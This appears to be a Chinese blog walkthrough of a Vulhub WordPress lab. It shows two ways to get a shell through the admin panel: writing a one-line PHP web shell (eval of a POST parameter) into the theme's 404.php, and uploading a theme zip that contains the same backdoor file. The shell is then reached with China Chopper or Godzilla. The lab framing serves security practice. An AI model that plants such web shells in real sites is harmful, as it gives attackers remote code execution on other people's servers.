vulhub靶场之WordPress

第一步搭建环境

靶场地址,自行去gethub找

安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose

执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

开启docker

docker ps -a查看运行端口

访问进行wordpress设置

第二步 给404.php中写入一句话木马

搭建靶场后台

进行简单的网站后台设置后即可进入如下页面

思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php

在404.php中写入一句话木马,删除其原本文件(可选),并更新文件

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

访问以下路径可以访问到404.php文件

复制代码
/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置

对木马使用你的武器库吧,这里小编选择了菜刀

是兄弟就来wordpress砍我!

第三步 这次我们换一个姿势,上传文件来上传木马

接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件

下载之后把一个木马文件添加到这个zip压缩包中

这里小编上传了一个666.php,内容如下

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】

压缩文件中的文件名即为主题名

复制代码
访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php

对他使用你的哥斯拉吧

然而小编还是选择了菜刀,完

相关推荐
携欢4 分钟前
[特殊字符] 一次经典Web漏洞复现:修改序列化对象直接提权为管理员(附完整步骤)
前端·安全·web安全
Lethehong30 分钟前
第二届“启航杯“网络安全挑战赛开始啦!
安全·web安全·ctf·启航杯
lifejump1 小时前
Pikachu | Unsafe Filedownload
前端·web安全·网络安全·安全性测试
zhengfei6112 小时前
【AI工具】——人工智能驱动的自动化网络安全威胁检测平台
人工智能·web安全·自动化
emma羊羊2 小时前
Vulhub-AppWeb
网络·安全·web安全·vulhub
蓝之白12 小时前
流量分析_SnakeBackdoor-6
web安全·ctf·流量分析·逆向分析
白山云北诗18 小时前
企业网站网络安全防护方案
安全·web安全·网络安全·ddos防护·web应用防火墙·cc防护
2301_7807896620 小时前
服务器感染的病毒有哪些特点呢?
安全·web安全
上海云盾第一敬业销售21 小时前
CC攻击与流量劫持的关系解析
web安全
白帽子黑客杰哥1 天前
在实际渗透测试中,如何系统性地评估一个WAF规则集的有效性?
网络·web安全·kali